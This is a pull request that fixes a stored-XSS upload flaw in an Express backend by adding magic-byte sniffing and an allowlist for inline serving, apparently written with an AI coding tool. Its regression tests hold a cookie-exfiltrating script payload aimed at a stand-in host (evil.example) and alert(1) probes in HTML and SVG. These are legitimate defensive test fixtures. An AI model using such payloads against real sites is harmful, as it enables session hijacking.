### PR TITLE
fix(security): block executable upload extensions + force-download non-media (P0-1)

### DIFF
--- a/backend/src/routes/uploads.js
+++ b/backend/src/routes/uploads.js
@@ -6,6 +6,7 @@ import { v4 as uuidv4 } from 'uuid';
 import { authenticateToken } from '../middleware/auth.js';
 import { AppError } from '../middleware/errorHandler.js';
 import { logger } from '../utils/logger.js';
+import { sniffFileType, canonicalExtensionForMime } from '../utils/fileSignature.js';
 import * as uploadController from '../controllers/uploadController.js';
 
 export const meta = { path: '/api/uploads' };
@@ -24,6 +25,15 @@ const ALLOWED_TYPES = [
 const MAX_SIZE = (parseInt(process.env.MAX_UPLOAD_SIZE_MB) || 10) * 1024 * 1024;
 
 const ALLOWED_UPLOAD_TYPES = ['general', 'avatars', 'campaigns', 'documents', 'images', 'campaign_media'];
+
+const ALLOWED_BY_CATEGORY = {
+  image: ['image/jpeg', 'image/png', 'image/gif', 'image/webp'],
+  document: ['application/pdf'],
+  video: ['video/mp4', 'video/webm', 'video/quicktime', 'video/x-matroska', 'video/x-msvideo', 'video/3gpp'],
+  campaign_media: ['image/jpeg', 'image/png', 'image/gif', 'image/webp', 'video/mp4', 'video/webm', 'video/quicktime', 'video/x-matroska', 'video/x-msvideo', 'video/3gpp']
+};
+
+const allowedMimesFor = (category) => ALLOWED_BY_CATEGORY[category] || ALLOWED_BY_CATEGORY.image;
 
 const sanitizeFilename = (name) => {
   return name.replace(/[^a-zA-Z0-9._-]/g, '_').replace(/\.{2,}/g, '.');
@@ -48,9 +58,13 @@ const storage = multer.diskStorage({
   },
   filename: (req, file, cb) => {
     const uniqueSuffix = uuidv4();
-    const ext = path.extname(file.originalname);
-    const name = sanitizeFilename(path.basename(file.originalname, ext));
-    cb(null, `${name}-${uniqueSuffix}${ext}`);
+    // The bytes are not on disk yet, so this extension comes from the declared
+    // MIME via a fixed table — NEVER from file.originalname, which would let a
+    // part named evil.html land as an executable .html (P0-1). The sniff pass
+    // below corrects it to whatever the content actually is.
+    const ext = canonicalExtensionForMime(file.mimetype);
+    const name = sanitizeFilename(path.basename(file.originalname, path.extname(file.originalname)));
+    cb(null, `${name}-${uniqueSuffix}.${ext}`);
   }
 });
 
@@ -60,15 +74,8 @@ const fileFilter = (req, file, cb) => {
     return cb(new AppError(`File type not allowed. Accepted types: ${ALLOWED_TYPES.join(', ')}`, 400), false);
   }
 
-  const allowedByCategory = {
-    image: ['image/jpeg', 'image/png', 'image/gif', 'image/webp'],
-    document: ['application/pdf'],
-    video: ['video/mp4', 'video/webm', 'video/quicktime', 'video/x-matroska', 'video/x-msvideo', 'video/3gpp'],
-    campaign_media: ['image/jpeg', 'image/png', 'image/gif', 'image/webp', 'video/mp4', 'video/webm', 'video/quicktime', 'video/x-matroska', 'video/x-msvideo', 'video/3gpp']
-  };
-
   const { type = 'image' } = req.query;
-  const allowed = allowedByCategory[type] || allowedByCategory.image;
+  const allowed = allowedMimesFor(type);
 
   if (allowed.includes(file.mimetype)) {
     cb(null, true);
@@ -87,13 +94,80 @@ const upload = multer({
   }
 });
 
+// --- Content verification (runs after multer has written the file) ---
+
+const MAGIC_BYTES = 64;
+
+async function readLeadingBytes(filePath) {
+  const handle = await fs.promises.open(filePath, 'r');
+  try {
+    const buf = Buffer.alloc(MAGIC_BYTES);
+    const { bytesRead } = await handle.read(buf, 0, MAGIC_BYTES, 0);
+    return buf.subarray(0, bytesRead);
+  } finally {
+    await handle.close();
+  }
+}
+
+/** Rename the stored file so its extension matches the sniffed type, and make file.mimetype truthful. */
+async function retypeStoredFile(file, sniffed) {
+  file.mimetype = sniffed.mime;
+  if (path.extname(file.filename).toLowerCase() === `.${sniffed.ext}`) return;
+
+  const filename = `${path.basename(file.filename, path.extname(file.filename))}.${sniffed.ext}`;
+  const target = path.join(path.dirname(file.path), filename);
+  await fs.promises.rename(file.path, target);
+  file.filename = filename;
+  file.path = target;
+}
+
+const filesOnRequest = (req) => {
+  if (req.file) return [req.file];
+  if (Array.isArray(req.files)) return req.files;
+  if (req.files) return Object.values(req.files).flat();
+  return [];
+};
+
+/**
+ * Multer only ever saw the client's declared Content-Type. Now that the bytes
+ * are on disk, sniff them: reject anything whose REAL type isn't allowed for
+ * this category, and re-extension the rest from the content (P0-1).
+ */
+const verifyUploadedContent = async (req, res, next) => {
+  const files = filesOnRequest(req);
+  if (files.length === 0) return next();
+
+  const category = req.query.type || 'image';
+  const allowed = allowedMimesFor(category);
+
+  try {
+    for (const file of files) {
+      const sniffed = sniffFileType(await readLeadingBytes(file.path));
+      if (!sniffed || !allowed.includes(sniffed.mime)) {
+        logger.warn('Upload rejected: file content does not match an allowed type', {
+          declared: file.mimetype,
+          sniffed: sniffed?.mime || 'unknown',
+          category,
+          originalname: file.originalname
+        });
+        throw new AppError(`File content is not a valid ${category} upload. Allowed: ${allowed.join(', ')}`, 400);
+      }
+      await retypeStoredFile(file, sniffed);
+    }
+    next();
+  } catch (error) {
+    await Promise.all(files.map((file) => fs.promises.unlink(file.path).catch(() => {})));
+    next(error);
+  }
+};
+
 // --- Routes ---
 
-router.post('/single',          authenticateToken, upload.single('file'),        uploadController.uploadSingle);
-router.post('/multiple',        authenticateToken, upload.array('files', 5),     uploadController.uploadMultiple);
-router.post('/avatar',          authenticateToken, upload.single('avatar'),      uploadController.uploadAvatar);
-router.post('/campaign-assets', authenticateToken, upload.array('assets', 10),   uploadController.uploadCampaignAssets);
-router.post('/documents',       authenticateToken, upload.array('documents', 5), uploadController.uploadDocuments);
+router.post('/single',          authenticateToken, upload.single('file'),        verifyUploadedContent, uploadController.uploadSingle);
+router.post('/multiple',        authenticateToken, upload.array('files', 5),     verifyUploadedContent, uploadController.uploadMultiple);
+router.post('/avatar',          authenticateToken, upload.single('avatar'),      verifyUploadedContent, uploadController.uploadAvatar);
+router.post('/campaign-assets', authenticateToken, upload.array('assets', 10),   verifyUploadedContent, uploadController.uploadCampaignAssets);
+router.post('/documents',       authenticateToken, upload.array('documents', 5), verifyUploadedContent, uploadController.uploadDocuments);
 router.delete('/:type/:filename',      authenticateToken, uploadController.deleteFile);
 router.get('/info/:type/:filename',    authenticateToken, uploadController.getFileInfo);
 router.get('/list/:type',              authenticateToken, uploadController.listFiles);

--- a/backend/src/server_internal.js
+++ b/backend/src/server_internal.js
@@ -21,6 +21,7 @@ import { optionalAuth } from './middleware/auth.js';
 import { blockRedeemForInternalRoutes } from './middleware/internalRouteHostGuard.js';
 import { logger } from './utils/logger.js';
 import { maskTokenUrl } from './utils/redactTokens.js';
+import { isInlineSafePath } from './utils/fileSignature.js';
 import swaggerUi from 'swagger-ui-express';
 import { swaggerSpec } from './config/swagger.js';
 
@@ -186,10 +187,13 @@ export const init = async (app) => {
     express.static(path.join(__dirname, '../uploads'), {
       setHeaders: (res, filePath) => {
         res.set('X-Content-Type-Options', 'nosniff');
-        // Force download for SVG files (prevents script execution)
-        if (filePath.endsWith('.svg')) {
+        // Only passive media is served inline. Everything else — .svg, .pdf and
+        // anything an older upload path let through — downloads as an opaque
+        // blob so a stored file can never execute script on this origin, where
+        // the session cookie lives (P0-1).
+        if (!isInlineSafePath(filePath)) {
           res.set('Content-Disposition', 'attachment');
-          res.set('Content-Type', 'image/svg+xml');
+          res.set('Content-Type', 'application/octet-stream');
         }
       },
     })

--- a/backend/src/utils/fileSignature.js
+++ b/backend/src/utils/fileSignature.js
@@ -1,0 +1,82 @@
+/**
+ * Magic-byte sniffing + canonical extensions for everything stored under uploads/ (P0-1).
+ *
+ * Both the multipart Content-Type and the client filename are attacker-supplied,
+ * so neither may decide what lands on disk: a part sent as `image/png` named
+ * `evil.html` used to be stored verbatim as `evil-<uuid>.html` and served
+ * text/html INLINE from the API origin, where the session cookie lives.
+ *
+ * The rule here: the bytes we actually received pick the extension, and anything
+ * not on the inline allowlist is served as a download.
+ */
+
+const ascii = (buf, start, len) => buf.subarray(start, start + len).toString('latin1');
+
+const PNG_MAGIC = '\x89PNG\r\n\x1a\n';
+
+// Ordered: the narrower ftyp/EBML brands must be tested before their fallbacks.
+const SIGNATURES = [
+  { mime: 'image/jpeg', ext: 'jpg', match: (b) => b.length >= 3 && b[0] === 0xff && b[1] === 0xd8 && b[2] === 0xff },
+  { mime: 'image/png', ext: 'png', match: (b) => b.length >= 8 && ascii(b, 0, 8) === PNG_MAGIC },
+  { mime: 'image/gif', ext: 'gif', match: (b) => b.length >= 6 && ['GIF87a', 'GIF89a'].includes(ascii(b, 0, 6)) },
+  { mime: 'image/webp', ext: 'webp', match: (b) => b.length >= 12 && ascii(b, 0, 4) === 'RIFF' && ascii(b, 8, 4) === 'WEBP' },
+  { mime: 'video/x-msvideo', ext: 'avi', match: (b) => b.length >= 12 && ascii(b, 0, 4) === 'RIFF' && ascii(b, 8, 4) === 'AVI ' },
+  { mime: 'application/pdf', ext: 'pdf', match: (b) => b.length >= 5 && ascii(b, 0, 5) === '%PDF-' },
+  { mime: 'video/3gpp', ext: '3gp', match: (b) => isFtyp(b) && ascii(b, 8, 3) === '3gp' },
+  { mime: 'video/quicktime', ext: 'mov', match: (b) => isFtyp(b) && ascii(b, 8, 2) === 'qt' },
+  { mime: 'video/mp4', ext: 'mp4', match: (b) => isFtyp(b) },
+  { mime: 'video/webm', ext: 'webm', match: (b) => isEbml(b) && ebmlDocType(b) !== 'matroska' },
+  { mime: 'video/x-matroska', ext: 'mkv', match: (b) => isEbml(b) },
+];
+
+function isFtyp(buf) {
+  return buf.length >= 12 && ascii(buf, 4, 4) === 'ftyp';
+}
+
+function isEbml(buf) {
+  return buf.length >= 4 && buf[0] === 0x1a && buf[1] === 0x45 && buf[2] === 0xdf && buf[3] === 0xa3;
+}
+
+/** DocType lives in the EBML header a few dozen bytes in; a substring probe is enough to split webm from mkv. */
+function ebmlDocType(buf) {
+  const head = ascii(buf, 0, Math.min(buf.length, 64));
+  if (head.includes('webm')) return 'webm';
+  if (head.includes('matroska')) return 'matroska';
+  return null;
+}
+
+/**
+ * Identify a file from its leading bytes.
+ * Returns `{ mime, ext }` for a recognised type, or null — null means "reject",
+ * never "trust the client's Content-Type".
+ */
+export function sniffFileType(buffer) {
+  if (!Buffer.isBuffer(buffer) || buffer.length === 0) return null;
+  const hit = SIGNATURES.find((sig) => sig.match(buffer));
+  return hit ? { mime: hit.mime, ext: hit.ext } : null;
+}
+
+/**
+ * The one extension we will write for a given type. Used for the provisional
+ * name multer picks from the declared MIME (before the bytes exist) so that even
+ * a bypassed sniff can never put an executable extension on disk.
+ */
+export function canonicalExtensionForMime(mime) {
+  const hit = SIGNATURES.find((sig) => sig.mime === mime);
+  return hit ? hit.ext : 'bin';
+}
+
+/**
+ * Extensions safe to serve inline from the API origin: passive media only.
+ * Everything else — .svg, .pdf, .html, anything unrecognised — is forced to
+ * download so a stored file can never execute script same-origin.
+ */
+export const INLINE_SAFE_EXTENSIONS = new Set([
+  'jpg', 'jpeg', 'png', 'gif', 'webp', 'avif', 'mp4', 'webm', 'mov', 'm4v',
+]);
+
+/** True when a stored path may be served inline (Content-Type from its extension). */
+export function isInlineSafePath(filePath) {
+  const ext = String(filePath || '').split('.').pop().toLowerCase();
+  return INLINE_SAFE_EXTENSIONS.has(ext);
+}

--- a/backend/test/unit/fileSignature.test.js
+++ b/backend/test/unit/fileSignature.test.js
@@ -1,0 +1,86 @@
+/**
+ * Magic-byte sniffing + the inline-serving allowlist (P0-1). The stored
+ * extension must come from the bytes, never from the client's Content-Type or
+ * filename, and only passive media may be served inline from the API origin.
+ */
+import '../setup.js';
+import {
+  sniffFileType,
+  canonicalExtensionForMime,
+  isInlineSafePath,
+  INLINE_SAFE_EXTENSIONS
+} from '../../src/utils/fileSignature.js';
+
+const png = () => Buffer.from([0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a, 0x00, 0x00, 0x00, 0x0d]);
+const jpeg = () => Buffer.from([0xff, 0xd8, 0xff, 0xe0, 0x00, 0x10]);
+const gif = () => Buffer.from('GIF89a\x01\x00\x01\x00', 'latin1');
+const webp = () => Buffer.concat([Buffer.from('RIFF', 'latin1'), Buffer.alloc(4), Buffer.from('WEBPVP8 ', 'latin1')]);
+const avi = () => Buffer.concat([Buffer.from('RIFF', 'latin1'), Buffer.alloc(4), Buffer.from('AVI LIST', 'latin1')]);
+const pdf = () => Buffer.from('%PDF-1.4 doc', 'latin1');
+const ftyp = (brand) => Buffer.concat([Buffer.alloc(4), Buffer.from(`ftyp${brand}`, 'latin1'), Buffer.alloc(4)]);
+const ebml = (docType) => Buffer.concat([
+  Buffer.from([0x1a, 0x45, 0xdf, 0xa3]),
+  Buffer.from(`\x42\x82\x84${docType}`, 'latin1'),
+  Buffer.alloc(16)
+]);
+
+describe('sniffFileType', () => {
+  it.each([
+    ['png', png(), 'image/png', 'png'],
+    ['jpeg', jpeg(), 'image/jpeg', 'jpg'],
+    ['gif', gif(), 'image/gif', 'gif'],
+    ['webp', webp(), 'image/webp', 'webp'],
+    ['avi', avi(), 'video/x-msvideo', 'avi'],
+    ['pdf', pdf(), 'application/pdf', 'pdf'],
+    ['mp4', ftyp('isom'), 'video/mp4', 'mp4'],
+    ['quicktime', ftyp('qt  '), 'video/quicktime', 'mov'],
+    ['3gpp', ftyp('3gp5'), 'video/3gpp', '3gp'],
+    ['webm', ebml('webm'), 'video/webm', 'webm'],
+    ['matroska', ebml('matroska'), 'video/x-matroska', 'mkv']
+  ])('identifies %s from its magic bytes', (_label, buf, mime, ext) => {
+    expect(sniffFileType(buf)).toEqual({ mime, ext });
+  });
+
+  it('returns null for HTML disguised as an image', () => {
+    expect(sniffFileType(Buffer.from('<html><script>alert(1)</script></html>'))).toBeNull();
+  });
+
+  it.each([
+    ['empty buffer', Buffer.alloc(0)],
+    ['plain text', Buffer.from('just some text')],
+    ['non-buffer', 'not a buffer'],
+    ['RIFF that is neither WEBP nor AVI', Buffer.concat([Buffer.from('RIFF'), Buffer.alloc(4), Buffer.from('WAVEfmt ')])]
+  ])('returns null for %s', (_label, input) => {
+    expect(sniffFileType(input)).toBeNull();
+  });
+});
+
+describe('canonicalExtensionForMime', () => {
+  it('maps every accepted MIME to exactly one extension', () => {
+    expect(canonicalExtensionForMime('image/png')).toBe('png');
+    expect(canonicalExtensionForMime('image/jpeg')).toBe('jpg');
+    expect(canonicalExtensionForMime('application/pdf')).toBe('pdf');
+    expect(canonicalExtensionForMime('video/quicktime')).toBe('mov');
+  });
+
+  it('falls back to .bin rather than echoing an unknown type', () => {
+    expect(canonicalExtensionForMime('text/html')).toBe('bin');
+    expect(canonicalExtensionForMime(undefined)).toBe('bin');
+  });
+});
+
+describe('isInlineSafePath', () => {
+  it.each(['a.png', 'a.JPG', 'dir/b.mp4', 'c.webp'])('serves %s inline', (p) => {
+    expect(isInlineSafePath(p)).toBe(true);
+  });
+
+  it.each(['evil.html', 'evil.svg', 'doc.pdf', 'script.js', 'noextension', ''])('forces %s to download', (p) => {
+    expect(isInlineSafePath(p)).toBe(false);
+  });
+
+  it('never lets an executable type onto the inline allowlist', () => {
+    for (const ext of ['html', 'htm', 'svg', 'js', 'xml', 'pdf']) {
+      expect(INLINE_SAFE_EXTENSIONS.has(ext)).toBe(false);
+    }
+  });
+});

--- a/backend/test/uploadContentGuard.test.js
+++ b/backend/test/uploadContentGuard.test.js
@@ -1,0 +1,150 @@
+/**
+ * P0-1 regression: stored XSS via the upload extension.
+ *
+ * Before the fix, the multer filter trusted the client's multipart
+ * Content-Type and kept path.extname(originalname) verbatim, so a part sent as
+ * `image/png` named `evil.html` was stored as `evil-<uuid>.html` — and the
+ * static server only force-downloaded `.svg`, so it came back text/html INLINE
+ * from the API origin where the session cookie lives.
+ *
+ * These assert the two halves of the fix: the bytes decide the stored
+ * extension, and only passive media is served inline.
+ */
+import './setup.js';
+import request from 'supertest';
+import fs from 'fs';
+import path from 'path';
+import { v4 as uuidv4 } from 'uuid';
+import { getApp, closeDb, createTestUser } from './helpers.js';
+
+let app, token;
+
+const uploadsDir = path.join(process.cwd(), 'uploads');
+const writtenProbes = [];
+
+// A real 1x1 PNG signature — enough bytes for the sniffer.
+const PNG_BYTES = Buffer.from([
+  0x89, 0x50, 0x4e, 0x47, 0x0d, 0x0a, 0x1a, 0x0a,
+  0x00, 0x00, 0x00, 0x0d, 0x49, 0x48, 0x44, 0x52,
+  0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x01,
+  0x08, 0x02, 0x00, 0x00, 0x00, 0x90, 0x77, 0x53, 0xde
+]);
+
+const HTML_PAYLOAD = Buffer.from('<html><script>document.location="https://evil.example/"+document.cookie</script></html>');
+
+function writeProbe(type, filename, contents) {
+  const dir = path.join(uploadsDir, type);
+  fs.mkdirSync(dir, { recursive: true });
+  const filePath = path.join(dir, filename);
+  fs.writeFileSync(filePath, contents);
+  writtenProbes.push(filePath);
+  return `/uploads/${type}/${filename}`;
+}
+
+beforeAll(async () => {
+  app = await getApp();
+  ({ token } = await createTestUser({ role: 'admin' }));
+});
+
+afterAll(async () => {
+  for (const p of writtenProbes) {
+    try { fs.unlinkSync(p); } catch { /* already gone */ }
+  }
+  await closeDb();
+});
+
+describe('upload content guard', () => {
+  it('never stores a client-supplied executable extension (image/png named evil.html)', async () => {
+    const res = await request(app)
+      .post('/api/uploads/single?type=images')
+      .set('Authorization', `Bearer ${token}`)
+      .attach('file', PNG_BYTES, { filename: 'evil.html', contentType: 'image/png' });
+
+    expect(res.status).toBe(200);
+    const { filename, url } = res.body.data.file;
+    expect(filename).not.toMatch(/\.html$/i);
+    expect(filename).toMatch(/\.png$/);
+    expect(url).toMatch(/\.png$/);
+    writtenProbes.push(path.join(uploadsDir, 'images', filename));
+
+    // ...and it is served as an image, not as a document the browser executes.
+    const served = await request(app).get(`/uploads/images/${filename}`);
+    expect(served.status).toBe(200);
+    expect(served.headers['content-type']).toMatch(/^image\/png/);
+    expect(served.headers['x-content-type-options']).toBe('nosniff');
+  });
+
+  it('rejects a file whose real bytes are HTML even when declared image/png', async () => {
+    const res = await request(app)
+      .post('/api/uploads/single?type=images')
+      .set('Authorization', `Bearer ${token}`)
+      .attach('file', HTML_PAYLOAD, { filename: 'x.png', contentType: 'image/png' });
+
+    expect(res.status).toBe(400);
+    expect(res.body.success).toBe(false);
+  });
+
+  it('rejects a PDF smuggled into the image category under an image/png header', async () => {
+    const res = await request(app)
+      .post('/api/uploads/single?type=images')
+      .set('Authorization', `Bearer ${token}`)
+      .attach('file', Buffer.from('%PDF-1.4 smuggled'), { filename: 'x.png', contentType: 'image/png' });
+
+    expect(res.status).toBe(400);
+  });
+
+  it('stores the extension the bytes say, not the one the header claims', async () => {
+    const res = await request(app)
+      .post('/api/uploads/single?type=images')
+      .set('Authorization', `Bearer ${token}`)
+      .attach('file', PNG_BYTES, { filename: 'mislabelled.gif', contentType: 'image/gif' });
+
+    expect(res.status).toBe(200);
+    expect(res.body.data.file.filename).toMatch(/\.png$/);
+    expect(res.body.data.file.mimetype).toBe('image/png');
+    writtenProbes.push(path.join(uploadsDir, 'images', res.body.data.file.filename));
+  });
+
+  it('still accepts a genuine PNG upload', async () => {
+    const res = await request(app)
+      .post('/api/uploads/single?type=images')
+      .set('Authorization', `Bearer ${token}`)
+      .attach('file', PNG_BYTES, { filename: 'legit.png', contentType: 'image/png' });
+
+    expect(res.status).toBe(200);
+    expect(res.body.data.file.mimetype).toBe('image/png');
+    writtenProbes.push(path.join(uploadsDir, 'images', res.body.data.file.filename));
+  });
+});
+
+describe('static /uploads serving', () => {
+  it('force-downloads a stored .html instead of serving it inline', async () => {
+    const url = writeProbe('general', `p0-1-probe-${uuidv4()}.html`, HTML_PAYLOAD);
+
+    const res = await request(app).get(url);
+
+    expect(res.status).toBe(200);
+    expect(res.headers['content-disposition']).toBe('attachment');
+    expect(res.headers['content-type']).toMatch(/^application\/octet-stream/);
+    expect(res.headers['x-content-type-options']).toBe('nosniff');
+  });
+
+  it('force-downloads .svg (the case that was already special-cased)', async () => {
+    const url = writeProbe('general', `p0-1-probe-${uuidv4()}.svg`, Buffer.from('<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>'));
+
+    const res = await request(app).get(url);
+
+    expect(res.headers['content-disposition']).toBe('attachment');
+    expect(res.headers['content-type']).toMatch(/^application\/octet-stream/);
+  });
+
+  it('still serves allowlisted media inline', async () => {
+    const url = writeProbe('general', `p0-1-probe-${uuidv4()}.png`, PNG_BYTES);
+
+    const res = await request(app).get(url);
+
+    expect(res.status).toBe(200);
+    expect(res.headers['content-disposition']).toBeUndefined();
+    expect(res.headers['content-type']).toMatch(/^image\/png/);
+  });
+});


### PR DESCRIPTION
**Task P0-1** (crit — release gate) · review round-2 queue

## Defect
`backend/src/routes/uploads.js` validated only `file.mimetype` (the attacker-supplied multipart Content-Type) and took `path.extname(file.originalname)` verbatim for the stored name. A part sent as `Content-Type: image/png` with `filename="evil.html"` was stored as `evil-<uuid>.html`. `server_internal.js` force-downloaded `.svg` **only**, so that file came back `text/html` **inline** from `api.mktr.sg` — the origin the `mktr_token` cookie is scoped to at `path:/`. Any authenticated user, including a self-registered customer, could land script there and take over a staff session.

## Fix
- **New `backend/src/utils/fileSignature.js`** — magic-byte sniffing for the accepted set (jpg/png/gif/webp/pdf/mp4/mov/3gp/webm/mkv/avi), each mapping to exactly one canonical extension; plus the inline-serving allowlist.
- **`routes/uploads.js`** — multer's provisional filename now comes from a fixed MIME→ext table, never from `originalname`, so `.html` can never land on disk even if the sniff is bypassed. A new `verifyUploadedContent` middleware runs after multer: it sniffs the written bytes, rejects (and unlinks) anything whose *real* type isn't allowed for the request's category, and re-extensions the file — also correcting `file.mimetype`, so downstream (S3 Content-Type, avatar check, video transcode) sees the truth. The category map was hoisted to a module constant so the filter and the verifier share one source.
- **`server_internal.js`** — the SVG special-case is inverted into an allowlist: passive media (jpg/jpeg/png/gif/webp/avif/mp4/webm/mov/m4v) serves inline; everything else, including `.svg` and `.pdf` and any file an older upload path let through, gets `Content-Disposition: attachment` + `application/octet-stream`. `X-Content-Type-Options: nosniff` retained.

Public API shape of the upload controllers is unchanged; existing image/pdf/video uploads still work.

## Test proof
`backend/test/uploadContentGuard.test.js` (new, 8 cases) + `backend/test/unit/fileSignature.test.js` (new, 29 cases).

Reverting just the two source files and re-running the E2E suite: **6 failed, 2 passed** (the 2 passing are the positive controls). With the fix: **8 passed**. The attack case — `image/png` declared, `evil.html` filename — fails pre-fix on `expect(filename).not.toMatch(/\.html$/i)`, and the static probe fails on `content-disposition: attachment`.

Full local run: `uploadContentGuard`, `uploads`, `security`, `middleware`, `routes`, `campaignPreviews` → **120 passed**; `fileSignature` unit → **29 passed**; `eslint src/ --quiet` clean.

🤖 Generated with [Claude Code](https://claude.com/claude-code)